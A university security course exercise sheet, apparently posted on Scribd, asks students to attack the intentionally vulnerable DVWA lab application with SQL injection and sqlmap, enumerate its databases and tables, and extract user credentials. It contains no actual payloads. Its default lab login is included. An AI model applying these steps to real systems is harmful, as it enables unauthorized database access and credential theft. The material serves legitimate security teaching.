Scribd
Upload
4 views

Week 9 Exercise

Uploaded by

depressedshisuii
Copyright
© © All Rights Reserved
Available Formats
Download as DOCX, PDF, TXT or read online on Scribd
4 views

Week 9 Exercise

Uploaded by

depressedshisuii
Copyright
© © All Rights Reserved
Available Formats
Download as DOCX, PDF, TXT or read online on Scribd
You are on page 1/ 1

Week 9 Exercise (Gaining Access / Exploitation of Web Application)

Damn Vulnerable Web Application (DVWA) is a PHP/MySQL web application that is used as aid
penetration testers and security professionals to test their skills and tools. It is an example PHP
application that is intentionally vulnerable to web attacks. As a penetration tester, you are
required to perform a Vulnerability Assessment and Penetration Testing (VAPT) on the web
application using tools and manual hacking skills you have learned in the ITT320 lab session.

Based on your VAPT activity, answer the following questions.

a. Go to “http://IP_Address/dvwa/login.php” and login using default username = admin


and default password = password. Select “SQL injection” from the menu on the left.

i. Perform a SQL Injection attack on DVWA and check if vulnerability is present. Explain
the output.

ii. List the users and passwords that are available in the database after performing a
SQL Injection attack.

(8 Marks)

b. Based on the web application vulnerability in (a), conduct a database exploitation on


“http://IP_Address/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#&#8221” to
gain sensitive information.

i. What available databases are running in the above url? (capture your answer
with the SQLMAP command)
ii. How many tables are available in the above url? (capture your answer with the
SQLMAP command)
iii. What is the table name that relates to user details? (capture your answer)

(6 Marks)

c. List all usernames and passwords of users for the above url application.

(6 Marks)

You might also like